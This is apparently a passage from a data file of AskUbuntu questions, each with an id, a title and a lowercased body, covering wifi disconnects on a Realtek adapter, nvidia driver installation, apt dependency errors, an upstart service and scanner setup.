//bg.archive.ubuntu.com/ubuntu/ precise/main amd64 packages how can i solve this problem ? thanks , my system is ubuntu13.04 , 64-bit .
355579	how can i install the latest version of gromacs ?	the version of gromacs available in the ubuntu software center ? is not the latest available version . how can i install the latest version of gromacs without using the ubuntu software center ?
355581	one week in , and still having disconnect issues . tried everything i could find on here	for the past week i have been scouring google search and specifically `` askubuntu '' for the fix for my intermittent disconnects on wifi signal . i 've posted this question a few days ago , and was lead down a path to which there was no fix . perhaps my question was n't clear enough . almost all threads i 've found are from people who can not connect . i can connect , it just drops periodically.i doubt this is a duplicate post , because i 've tried everything on similar posts and still have this issue . maybe i 'm not using the right keywords though . here are the facts : despite that my computer is literally 5 feet away from my router , i get periodic disconnects . also , most of the time my wifi icon reads 3 out of 4 bars . i run a 3rd party vpn , and although the disconnect is for only a second , i lose my vpn connection . this causes me to have to monitor my icon to make sure there was no drop . before i go any further i 'll mention that i am on a toshiba satellite l755 . i am running dual boot operating systems , windows 7 and ubuntu 12.04 lts . i have already sent a log to my vpn server who shows that there are no errors on their end . plus , i 'm not always connected through vpn , yet i still get a popup saying `` disconnected '' . also , of course , i have no issue while running windows7 on this machine . so for the past week , i have been trying everything and anything that comes up in my search . it 's worth saying that i am doing these things blindly , and have no idea if they actually pertain to my issue , but since it was suggested to other users with similar problems , i tried it . here 's what i 've tried so far that has not worked : when i command sudo lspci it shows that my network controller is network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) it was suggested somewhere that i try sudo iwconfig wlan0 power off to which i get this : '' error for wireless request `` set power management '' ( 8b2c ) : set failed on device wlan0 ; operation not supported '' . whether this has anything to do with my problem , i have no idea . it was suggested i go into `` system settings > additional drivers and i found : '' no proprietary drivers are in use on this system '' i found alot of common answers were based on the fact that my driver , realtek , does not play well or work with ubuntu . it was suggested on similar threads to download a new driver . here are the steps i followed . sudo apt-get install gcc build-essential linux-headers-generic linux-headers- $ ( uname -r ) for necessary dependencies 1 ) download driver from : realtek website http : //152.104.125.41/downloads/downloadsview.aspx ? langid=1 & pnid=48 & pfid=48 & level=5 & conn=4 & downtypeid=3 & getdown=false & downloads=true # 2722 and copy it to your desktop ( it 's about 12 mb download ) . 2 ) right-click the downloaded file ( linux_mac80211_0012.0207.2013.tar.bz2 ) > `` extract here '' . this will extract a folder named `` rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_001 2.0207.2013 '' on your desktop . 3 ) open a terminal ( ctrl+alt+t ) and run following commands : code : cd ~/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 make sudo make install 4 ) reboot or manually load the driver with - code : sudo modprobe -v rtl8188ee after doing this , nothing changed . i restarted the computer , and still had the same issues . i mention that after doing step 3 above , i get a long scroll of activity , but there a number of error messages : it is at this point that i get help to my question , and was told to try this : '' '' '' '' first , let 's clean up the file from your first attempt : cd desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 make clean now , let 's modify one file : gedit pci.h at the top of the file , after the comment section all out lined in ** , add this sequence : # ifndef __devinit # define __devinit # define __devinitdata # endif proofread carefully , save and close gedit . now do : make sudo make install finally , i believe the driver you need is rtl8192ce and not rtl8188ee : sudo modprobe rtl8192ce your wireless should now be working '' '' '' '' . here is how i entered the lines in pci.h at first , i noticed that i had 4 bars in wifi ( instead of 3 ) apparently there is no other way to see if what i did actually worked though . it was n't until yesterday that i noticed that the disconnection problem still persisted . so far while typing this question , my signal has dropped twice . at this point , i 've tried everything in all the threads that i could find . i do n't know where to go next . any help ? edit/follow up : below in comments @ chili555 asks for me to confirm driver by running lsmod | grep rtl my results : rtl8192ce 141806 0 rtlwifi 123323 1 rtl8192ce mac80211 630977 2 rtl8192ce , rtlwifi cfg80211 525326 2 rtlwifi , mac80211 also , whether or not my power management is on or off by running : iwconfig | grep power my results : tun0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . bit rate=72.2 mb/s tx-power=20 dbm power management : off also i took the liberty of running : lspci -nn | grep 0280 my results : 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) further edits : within 5 minutes after disconnect i run this : ~ $ cat /var/log/syslog | grep -e etwork -e wlan | tail -n20 my results : oct 9 18:49:57 mike-ubuntu12 kernel : [ 6452.055962 ] wlan0 : rx assocresp from 58:6d:8f:89:14:46 ( capab=0x11 status=0 aid=3 ) oct 9 18:49:57 mike-ubuntu12 kernel : [ 6452.056232 ] wlan0 : associated oct 9 18:49:57 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associated oct 9 18:49:57 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake oct 9 18:49:57 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed oct 9 18:51:42 mike-ubuntu12 kernel : [ 6557.222852 ] wlan0 : connection to ap 58:6d:8f:89:14:46 lost oct 9 18:51:42 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected oct 9 18:51:42 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : roamed from bssid 58:6d:8f:89:14:46 ( highmoon ) to ( none ) ( ( none ) ) oct 9 18:51:42 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning oct 9 18:51:43 mike-ubuntu12 kernel : [ 6558.171237 ] wlan0 : authenticate with 58:6d:8f:89:14:46 oct 9 18:51:43 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating oct 9 18:51:43 mike-ubuntu12 kernel : [ 6558.190989 ] wlan0 : send auth to 58:6d:8f:89:14:46 ( try 1/3 ) oct 9 18:51:43 mike-ubuntu12 kernel : [ 6558.192747 ] wlan0 : authenticated oct 9 18:51:43 mike-ubuntu12 kernel : [ 6558.194187 ] wlan0 : associate with 58:6d:8f:89:14:46 ( try 1/3 ) oct 9 18:51:43 mike-ubuntu12 kernel : [ 6558.197471 ] wlan0 : rx assocresp from 58:6d:8f:89:14:46 ( capab=0x11 status=0 aid=3 ) oct 9 18:51:43 mike-ubuntu12 kernel : [ 6558.197782 ] wlan0 : associated oct 9 18:51:43 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associated oct 9 18:51:43 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake oct 9 18:51:43 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed oct 9 18:51:48 mike-ubuntu12 networkmanager [ 975 ] : < info > ( wlan0 ) : roamed from bssid ( none ) ( ( none ) ) to 58:6d:8f:89:14:46 ( highmoon ) further edits via @ coteyr : i tried $ iwconfig wlan0 while i was on normal /non vpn connection . my results : wlan0 ieee 802.11bgn essid : '' highmoon '' mode : managed frequency:2.437 ghz access point : 58:6d:8f:89:14:46 bit rate=7.2 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=70/70 signal level=-22 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:11 missed beacon:0 also for coteyr : my router is linksys cisco e4200 edits 2 days later : while running clean/no vpn , my computer disconnected . i run : ~ $ cat /var/log/syslog | grep -e etwork -e wlan | tail -n20 interface wlan0.ipv4 with address 192.168.1.116 . oct 10 18:19:08 mike-ubuntu12 avahi-daemon [ 959 ] : new relevant interface wlan0.ipv4 for mdns . oct 10 18:19:08 mike-ubuntu12 avahi-daemon [ 959 ] : registering new address record for 192.168.1.116 on wlan0.ipv4 . oct 10 18:19:08 mike-ubuntu12 dhclient : xmt : info-request on wlan0 , interval 930ms . oct 10 18:19:09 mike-ubuntu12 networkmanager [ 970 ] : < info > ( wlan0 ) : writing resolv.conf to /sbin/resolvconf oct 10 18:19:09 mike-ubuntu12 networkmanager [ 970 ] : < info > ( wlan0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] oct 10 18:19:09 mike-ubuntu12 networkmanager [ 970 ] : < info > policy set 'highmoon ' ( wlan0 ) as default for ipv4 routing and dns . oct 10 18:19:09 mike-ubuntu12 networkmanager [ 970 ] : < info > activation ( wlan0 ) successful , device activated . oct 10 18:19:09 mike-ubuntu12 networkmanager [ 970 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) complete . oct 10 18:19:09 mike-ubuntu12 dhclient : xmt : info-request on wlan0 , interval 1800ms . oct 10 18:19:11 mike-ubuntu12 dhclient : xmt : info-request on wlan0 , interval 3510ms . oct 10 18:19:15 mike-ubuntu12 dhclient : xmt : info-request on wlan0 , interval 7250ms . mike @
355582	what is kde 's relationship to the graphic 's drivers ? can someone explain how it works ?	today at school i was working with a laptop with kubuntu installed . i wanted to get a second monitor working . it was not recognized ( it 's an older 4:3 vga flatscreen monitor ) so i figured there was something wrong with the graphics card driver . no drivers were found in `` additional drivers '' so i decided to purge and re-install new drivers . i used : sudo apt-get remove -- purge nvidia-* this killed kde desktop . i then used : sudo apt-get install nvidia-current and then sudo apt-get install kubuntu-desktop ( after realizing the first command uninstalled it ) after a reboot it was stuck in 800x600 . i am going to re-install ubuntu 12.04 tomorrow ( because ubuntu installations tend to play well with proprietary drivers i find ) but i still want to understand what when wrong with kubuntu . why did purge uninstall kubuntu-desktop ?
355583	eagle cad - gtk look	i am an archlinux ( former ubuntu ) user and am writing here to ask how is the gtk ( adwaita ) look for application `` eagle cad '' achieved in gnome ubuntu remix or in normal ubuntu . i ca n't seem to find any topic on how to do it on any of the distributions ...
355586	log4cxx/logger.h or libcql/cql.hpp fatal error while doing make -j4	i am running make -j4 and i am getting below exception ... username @ phx5qa01c-4e23 : ~/build $ make -j4 [ 1 % ] [ 2 % ] building cxx object nda/common/loadtest/cmakefiles/loadtester.dir/loadtester.cc.o make [ 2 ] : *** no rule to make target `/usr/include/libcql/lib/libcql.so ' , needed by `nda/common/client/client ' . stop . make [ 2 ] : *** waiting for unfinished jobs ... . building cxx object nda/unittest/common/cmakefiles/testrunner.dir/testrunner.cc.o [ 3 % ] building cxx object nda/common/client/cmakefiles/client.dir/main.cc.o [ 4 % ] building cxx object nda/common/cmakefiles/ndacommon.dir/category_map/categorymap.cc.o in file included from /home/username/mpl/nda/common/client/main.cc:1 : /home/username/mpl/nda/common/client/be_cassandra_util.hh:5 : fatal error : libcql/cql.hpp : no such file or directory compilation terminated . make [ 2 ] : *** [ nda/common/client/cmakefiles/client.dir/main.cc.o ] error 1 make [ 1 ] : *** [ nda/common/client/cmakefiles/client.dir/all ] error 2 make [ 1 ] : *** waiting for unfinished jobs ... . [ 5 % ] building cxx object nda/common/cmakefiles/ndacommon.dir/curl_handler/curlhandler.cc.o /home/username/mpl/nda/common/curl_handler/curlhandler.cc:12 : fatal error : log4cxx/logger.h : no such file or directory compilation terminated . make [ 2 ] : *** [ nda/common/cmakefiles/ndacommon.dir/curl_handler/curlhandler.cc.o ] error 1 make [ 2 ] : *** waiting for unfinished jobs ... . /home/username/mpl/nda/unittest/common/testrunner.cc:8 : fatal error : log4cxx/logger.h : no such file or directory compilation terminated . make [ 2 ] : *** [ nda/unittest/common/cmakefiles/testrunner.dir/testrunner.cc.o ] error 1 make [ 1 ] : *** [ nda/unittest/common/cmakefiles/testrunner.dir/all ] error 2 /home/username/mpl/nda/common/category_map/categorymap.cc:11 : fatal error : log4cxx/logger.h : no such file or directory compilation terminated . make [ 2 ] : *** [ nda/common/cmakefiles/ndacommon.dir/category_map/categorymap.cc.o ] error 1 make [ 1 ] : *** [ nda/common/cmakefiles/ndacommon.dir/all ] error 2 linking cxx executable loadtester [ 5 % ] built target loadtester make : *** [ all ] error 2 below is the exception , i always get - fatal error : libcql/cql.hpp : no such file or directory fatal error : log4cxx/logger.h : no such file or directory i am not sure what should i do to fix these exceptions ? how do i install these two things by using sudo ?
355587	windows boot menu instead of grub	is it possible to switch boot loaders from grub to windows ? i do know if such a thing exist but it would be nice to have that option .
355588	trouble adjusting the brightness for sony vaio ( ubuntu 12.04 )	hi i seemed to run into a problem regarding the lighting for ubuntu 12.04 on my sony vaio ( vpc-cw2fgx/b ) . i used to be able to adjust the brightness when i first installed ubuntu , but when i installed the proprietary nvidia drivers the brightness and lock ( in system settings ) does not have the option to slide the brightness anymore . i went online and read a ton of other askubuntu links , but none of them worked . i 've tried : unable to adjust brightness on a sony vaio f133fxb how to use xbacklight with brightness keys in a vaio ^ i could n't get that one to work because there was nothing inside the /backlight folder . sony vaio-brightness settings not changing the only thing that worked for me was manually changing the backlight with an example command below : xbacklight -40 thanks if anyone could help !
355589	ubuntu software center old releases	is it possible to get older versions of software programs in the ubuntu software centre ? or they are permanently removed and replaced by newer versions ?
355592	how can i get a change to a .desktop file get recognized by unity/gnome ?	unity/gnome does not appear to pickup changes to .desktop files automatically ( in particular the `` name '' and `` icon '' fields ) . i have found update-desktop-database , but that does seems to update a mime database only ( and does not look into ~/.local/share/applications ( according to strace ) ) . after logging out and in again , the changes get recognized , but i would like to use a more convenient method of course .
355594	unity tweak tool for precise ?	i 've been looking everywhere for unity tweak tool in ubuntu 12.04 precise but i ca n't seem to find it so could anyone help ?
355595	how do i set up a wireless lan through my router	the main issue is i would like to be able to use one or the other / both of my laptops inter-dependently on a wlan ( wireless network ? ) how do i get the 2 different oses to recognize each other ? oses are win vista and ubuntu 13.04 router is a virgin super hub ( uk )
355596	why ca n't i connect to this service when launched via upstart ?	i have a web service written in golang that i need to fire up using upstart . i can run the service executable ( named word ) on port 5555 from within it 's directory manually like so : port=5555 ./word then curl -i http : //127.0.0.1:5555/api/word returns the correct response ( which is some json ) . now , i need to run this service via upstart . i 've written this script ( called word.conf ) : start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] chdir /home/word setgid word setuid word export port=5555 exec ./word i run it via sudo start word status word then tells me that the service is running and i see no errors in the upstart error logs . when trying to hit the service again via curl -i http : //127.0.0.1:5555/api/word i get a curl : ( 7 ) could n't connect to host error . this seems like it has to be some sort of permissions issue , but i ca n't pinpoint it . i tried removing the setgid and setuid and running with no luck . i do have a user called word . i 'm on ubuntu 12.04.3 . any ideas ?
355599	backup files ubuntu 12.04	i had a installation of ubuntu 12.04 that i could not get to function so i loaded another copy of it in a different partition . in the process i chose to back up the file in the previous version . the installation disk was ubuntu made easy which is what it was . now i would like to find the back up that it made in the process to see if i can get my files back . since i am a newby i am not sure how to find the files to restore them . anyone who can point me in the correct direction would be appreciated .
355601	can ubuntu provide an ide for c , c++ programming ?	i am a beginner in the field of programming . i have tried to learn c and c++ on a windows 7 computer using the turbo c++ compiler , but faced frequent failures and finally my laptop 's motherboard failed . please guide me so that can i install ubuntu on my windows 7 computer . can ubuntu provide a built-in ide for c , c++ programming , and if not , what is the solution for my problem on ubuntu ?
355617	need `` correct '' method to install nvidia driver on thinkpad running ubuntu 12.04+	yes , i have read how to install nvidia drivers and yes , i have looked for years and experimented extensively with directions from many dozens of pages . my question here on askubuntu yesterday was removed as already answered in error . please do not remove it again , as it is not answered . goal : glx working on any nvidia driver with at least a 1920 x 1080 x window display size . starting with : lenovo thinkpad w520 ubuntu 12.04 lts 64 bit http : //us.download.nvidia.com/xfree86/linux-x86/319.23/readme/installdriver.html http : //us.download.nvidia.com/xfree86/linux-x86_64/295.53/nvidia-linux-x86_64-295.53.run working x on 1920 x 1080 ( 16:9 ) laptop display ( no nvidia or glx ) actions : ctrl-alt-f1 login : passwd cd downloads sudo su service lightdm stop init 3 pushd /etc mkdir x11.backup ; cd x11 ; tar cf - .| ( cd ../x11.backup ; tar xf - ) # make a safe copy popd chmod +x nvidia . *run ./nvidia . *run service lightdm start problem 1 : x screen is 640x480 with no possibility of adjustment ( system settings > displays ) offers no size changes . small screen makes using x impossible . ctrl-alt-t nvidia-xconfig problem 2 : rewritten /etc/x11/xorg.conf does n't work any better . recovery : ctrl-alt-f1 login : passwd # if you logged out before sudo su cd /etc mv x11 x11.nvidia mkdir x11 cd x11.backup tar cf - .| ( cd ../x11 ; tar xf - ) service lightdm start now i am back to my beloved 1920 x 1080 x-windows , with no nvidia and no glx . i 've been experimenting with making nvidia work on this laptop for years without success . bumblebee , and every other thing i have tried leads to the same lack of nvidia or screen size control . i have tried numerous changes to bios ( optimus etc ... ) please offer advice on reaching my goal . the more detailed the command sequence , the better . explanation is of secondary importance , and the less there is , the easier it is to run the commands . i will return the favor by posting a precise sequence of actions that leads to successful installation as it actually is done on my machine . it may help other thinkpad owners who i have seen struggling with this .
355620	trying to reinstall windows but ubuntu not showing cd in boot menu	i am trying to reinstall windows on my laptop . however , the cd option is missing from my boot menu . i know it was there before becuase i used a cd to upload ubuntu . i thought maybe my drivers needed updating ( as the blu-ray has n't worked since installing ubuntu ) , but after i download them , ubuntu wo n't open them . so i ca n't use the cd reader without drivers but the drivers wo n't install without windows . i have the windows 7 installation disk and key . very frustrating to not be able to run them .
355622	canon mp280 scanner not working	i have a canon mp280 all-in-one . i have tried many things to get the scanner to work but everything failed . when i run sane - find - scanner ubuntu replies : found usb scanner ( vendor=0x04a9 [ canon ] , product=0x1746 [ mp280 series ] ) at libusb:001:004 found usb scanner ( vendor=0x0846 , product=0x9018 ) at libusb:001:003 i have the following packages intalled : canon printer driver common modules- cndrvcups-common 2.50-1-2~precise1 ij printer driver for linux.- cnijfilter-common 3.90-63~precise1 ij printer driver for linux . cnijfilter-mp280series 3.90-63~precise1 scangear mp for linux . scangearmp-common 2.10-33~precise1 scangear mp for linux . scangearmp-mp280series 2.10-33~precise1 the printer works since the first day i installed ubuntu but the scanner never . i have tried the following softwares : xsane simple scan scanlite i have installed the ppa 's as described buy ubuntu ask pages in : http : //www.launchpad.net/~michael-gruz/+archive/canon-trunk i added : sudo add-apt-repository ppa : michael-gruz/canon-trunk plus : sudo apt-get update just before i send this question i run scangearamp from terminal and it finally worked . but only typing the above command in the terminal . is there something i can do to improve that ?
355626	apt held packages , ca n't install package	on ubuntu 12.10 when trying sudo apt-get install mono-complete to install mono , i get : enter codreading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mono-complete : depends : mono-devel ( = 2.10.8.1-5ubuntu1 ) but it is not going to be installed depends : libmono-cil-dev ( = 2.10.8.1-5ubuntu1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried removing mono-devel and libmono-cil-dev but they are not installed . i 've tried sudo apt-get clean & & apt-get update & & apt-get upgrade but it does not help . dpkg -- get-selections | grep hold does not give any results , so it seems that no packages are actually held . i 've also tried dpkg -- configure -a and apt-get install -f neither of which helped either . strangely though , i do have mono installed in /usr/bin/mono . the way that i got into this mess was that i tried to get the latest versions by following the directions here : http : //www.meebey.net/posts/mono_3.0_preview_debian_ubuntu_packages/ . apt-get was complaining about held packages at which point i did sudo apt-get dist-upgrade i do n't know if that was the cause of my current problems . anyway , after it continued to complain about packages being held , i removed that experimental mono deb source from my sources and removed mono-complete , and ran apt-get clean , update , and upgrade , to get back the blank slate . at that point , i tried to install mono-complete from a blank slate , and arrived to my current situation . edit : $ apt-cache policy mono-devel libmono-cil-dev mono-devel : installed : ( none ) candidate : 2.10.8.1-5ubuntu1 version table : 2.10.8.1-5ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ quantal/main i386 packages 100 /var/lib/dpkg/status libmono-cil-dev : installed : ( none ) candidate : 2.10.8.1-5ubuntu1 version table : 2.10.8.1-5ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ quantal/main i386 packages @ meebey of the linked experimental page recommends apt-get remove cli-common for a full mono removal which outputs this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mono-xsp4 : depends : mono-xsp4-base ( = 2.10-2.1 ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . resolved i resolved this issue by adding the experimental ppa back and removed mono-complete and cli-common . then i removed the experimental ppa again which got me back to a blank slate . for that reason i do n't consider this a duplicate issue , but it does n't matter .
355632	scroll with stylus & keyboard shortcut	i 'm using a stylus with a touch screen and looking for a way to scroll with just the single point touch by holding down a modifier key . i get a similar effect to what i 'm looking for by holding down alt and dragging the stylus which moves the window around . if i could change this to scrolling within the window that would be great . thanks !
355633	ubuntu freeze for 1 second every minute then resumes	this is my first question here in the forum . i 'm quite ignorant on linux overall , i am doing my first steps now . i have installed ubuntu 13.04 on my computer that is a samsung notebook , i7 , 8gb ram , and intel sandybridge mobile video device what is happening is that about every minute the whole system freeze for half a second , then it resumes to normal . an interesting details is that if i am playing music , the music continues to play normally even while everything else is freeze . the installation is new , i have only installed heroku , git and emacs as far as i recall . i have looked for similar posts and executed several steps , but did not work . in other cases i did not had the knowledge to follow the steps . i have no clue where to start troubleshooting , can you please guys help me ? thank you .
355634	increase size of toolbar and url bar in firefox ?	i installed ubuntu 12.04 and upgraded my firefox . however i would like to increase the size of the `` toolbar '' & `` urlbar '' like on windows . ( the new firefox has big and nice interface to use ) . how ca i do the same on ubuntu ?
355635	ubuntu server : dpkg returned an error code ( 1 )	i have experienced this error in the past but have been able to resolve it by running 'sudo apt-get -f install ' ; however , that is no longer the case . i have spent about 4 hours looking into this and would greatly appreciate any help ! terminal output : it all started when i tried to install the unoconv package : patrick @ server01 : ~ $ sudo apt-get install unoconv reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : initramfs-tools : depends : initramfs-tools-bin ( < 0.99ubuntu13.1.1~ ) but 0.99ubuntu13.2 is to be installed libapache2-mod-php5 : depends : apache2-api-20120211 depends : apache2 ( > = 2.4 ) depends : php5-common ( = 5.5.4+dfsg-1+debphp.org~precise+1 ) but 5.4.15-1~precise+1 is to be installed linux-server : depends : linux-headers-server ( = 3.2.0.43.51 ) but 3.2.0.54.64 is to be installed unoconv : depends : python-uno but it is not going to be installed recommends : libreoffice-core but it is not going to be installed recommends : libreoffice-java-common but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i try to install libreoffice-core or libreoffice-common i get the following output : patrick @ server01 : ~ $ sudo apt-get install libreoffice-common reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : initramfs-tools : depends : initramfs-tools-bin ( < 0.99ubuntu13.1.1~ ) but 0.99ubuntu13.2 is to be installed libapache2-mod-php5 : depends : apache2-api-20120211 depends : apache2 ( > = 2.4 ) depends : php5-common ( = 5.5.4+dfsg-1+debphp.org~precise+1 ) but 5.4.15-1~precise+1 is to be installed libreoffice-common : depends : libreoffice-style-default or libreoffice-style depends : ure but it is not going to be installed recommends : xfonts-mathml but it is not going to be installed recommends : libexttextcat-data but it is not going to be installed linux-server : depends : linux-headers-server ( = 3.2.0.43.51 ) but 3.2.0.54.64 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i noticed the server 's kernel being mentioned , i will return some output near the end of this post . here is the output when i run apt-get -f install patrick @ server01 : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-image-3.2.0-40-generic linux-image-3.2.0-39-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : apache2 apache2-bin apache2-data apache2-mpm-itk initramfs-tools libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap libgd3 libjson-c2 liblua5.1-0 libvpx1 linux-image-3.2.0-54-generic linux-image-server linux-server php5-cgi php5-cli php5-common php5-curl php5-gd php5-json php5-mcrypt php5-mysql suggested packages : apache2-doc apache2-suexec-pristine apache2-suexec-custom libgd-tools fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools php-pear php5-user-cache recommended packages : php5-readline the following packages will be removed : apache2.2-bin apache2.2-common the following new packages will be installed : apache2-bin apache2-data libgd3 libjson-c2 liblua5.1-0 libvpx1 linux-image-3.2.0-54-generic php5-json the following packages will be upgraded : apache2 apache2-mpm-itk initramfs-tools libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap linux-image-server linux-server php5-cgi php5-cli php5-common php5-curl php5-gd php5-mcrypt php5-mysql 15 upgraded , 8 newly installed , 2 to remove and 110 not upgraded . 37 not fully installed or removed . need to get 0 b/49.2 mb of archives . after this operation , 153 mb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : apache2.2-common : dependency problems , but removing anyway as you requested : apache2-mpm-itk depends on apache2.2-common ( = 2.2.22-1ubuntu1.3 ) . apache2 depends on apache2.2-common ( = 2.2.22-1ubuntu1.3 ) ; however : package apache2.2-common is to be removed . ( reading database ... 122179 files and directories currently installed . ) removing apache2.2-common ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for ufw ... ( reading database ... 121861 files and directories currently installed . ) preparing to replace apache2 2.2.22-1ubuntu1.3 ( using ... /apache2_2.4.6-3+debphp.org~precise+1_amd64.deb ) ... moving obsolete conffile /etc/apache2/mods-available/authz_default.load out of the way ... moving obsolete conffile /etc/apache2/mods-available/authn_default.load out of the way ... moving obsolete conffile /etc/apache2/mods-available/mem_cache.load out of the way ... moving obsolete conffile /etc/apache2/mods-available/mem_cache.conf out of the way ... moving obsolete conffile /etc/apache2/mods-available/authn_alias.load out of the way ... moving obsolete conffile /etc/apache2/mods-available/cern_meta.load out of the way ... moving obsolete conffile /etc/apache2/mods-available/disk_cache.load out of the way ... moving obsolete conffile /etc/apache2/mods-available/disk_cache.conf out of the way ... moving obsolete conffile /etc/apache2/mods-available/ident.load out of the way ... moving obsolete conffile /etc/apache2/mods-available/imagemap.load out of the way ... moving obsolete conffile /etc/apache2/mods-available/version.load out of the way ... unpacking replacement apache2 ... preparing to replace apache2-mpm-itk 2.2.22-1ubuntu1.3 ( using ... /apache2-mpm-itk_2.4.6-3+debphp.org~precise+1_amd64.deb ) ... * stopping web server apache2 * the apache2 configtest failed , so we are trying to kill it manually . this is almost certainly suboptimal , so please make sure your system is working as you 'd expect now ! ... waiting [ ok ] unpacking replacement apache2-mpm-itk ... selecting previously unselected package apache2-data . unpacking apache2-data ( from ... /apache2-data_2.4.6-3+debphp.org~precise+1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ( reading database ... 122245 files and directories currently installed . ) removing apache2.2-bin ... ( reading database ... 122164 files and directories currently installed . ) preparing to replace libaprutil1-ldap 1.3.12+dfsg-3 ( using ... /libaprutil1-ldap_1.5.2-1~precise+1_amd64.deb ) ... unpacking replacement libaprutil1-ldap ... preparing to replace libaprutil1-dbd-sqlite3 1.3.12+dfsg-3 ( using ... /libaprutil1-dbd-sqlite3_1.5.2-1~precise+1_amd64.deb ) ... unpacking replacement libaprutil1-dbd-sqlite3 ... preparing to replace libaprutil1 1.3.12+dfsg-3 ( using ... /libaprutil1_1.5.2-1~precise+1_amd64.deb ) ... unpacking replacement libaprutil1 ... selecting previously unselected package liblua5.1-0 . unpacking liblua5.1-0 ( from ... /liblua5.1-0_5.1.4-12ubuntu1_amd64.deb ) ... selecting previously unselected package apache2-bin . unpacking apache2-bin ( from ... /apache2-bin_2.4.6-3+debphp.org~precise+1_amd64.deb ) ... preparing to replace php5-mysql 5.4.15-1~precise+1 ( using ... /php5-mysql_5.5.4+dfsg-1+debphp.org~precise+1_amd64.deb ) ... unpacking replacement php5-mysql ... preparing to replace php5-cli 5.4.15-1~precise+1 ( using ... /php5-cli_5.5.4+dfsg-1+debphp.org~precise+1_amd64.deb ) ... unpacking replacement php5-cli ... preparing to replace php5-mcrypt 5.4.15-1~precise+1 ( using ... /php5-mcrypt_5.5.4+dfsg-1+debphp.org~precise+1_amd64.deb ) ... unpacking replacement php5-mcrypt ... preparing to replace php5-curl 5.4.15-1~precise+1 ( using ... /php5-curl_5.5.4+dfsg-1+debphp.org~precise+1_amd64.deb ) ... unpacking replacement php5-curl ... selecting previously unselected package libvpx1 . unpacking libvpx1 ( from ... /libvpx1_1.0.0-1_amd64.deb ) ... selecting previously unselected package libgd3 . unpacking libgd3 ( from ... /libgd3_2.1.0-2~precise+1_amd64.deb ) ... preparing to replace php5-gd 5.4.15-1~precise+1 ( using ... /php5-gd_5.5.4+dfsg-1+debphp.org~precise+1_amd64.deb ) ... unpacking replacement php5-gd ... preparing to replace php5-cgi 5.4.15-1~precise+1 ( using ... /php5-cgi_5.5.4+dfsg-1+debphp.org~precise+1_amd64.deb ) ... moving obsolete conffile /etc/apache2/mods-available/php5_cgi.load out of the way ... unpacking replacement php5-cgi ... selecting previously unselected package libjson-c2 . unpacking libjson-c2 ( from ... /libjson-c2_0.11-3+debphp.org~precise+1_amd64.deb ) ... preparing to replace php5-common 5.4.15-1~precise+1 ( using ... /php5-common_5.5.4+dfsg-1+debphp.org~precise+1_amd64.deb ) ... unpacking replacement php5-common ... dpkg : warning : unable to delete old directory '/etc/php5/conf.d ' : directory not empty selecting previously unselected package php5-json . unpacking php5-json ( from ... /php5-json_1.3.1+dfsg-4+debphp.org~precise+1_amd64.deb ) ... unpacking linux-image-3.2.0-54-generic ( from ... /linux-image-3.2.0-54-generic_3.2.0-54.82_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-54-generic_3.2.0-54.82_amd64.deb ( -- unpack ) : failed in 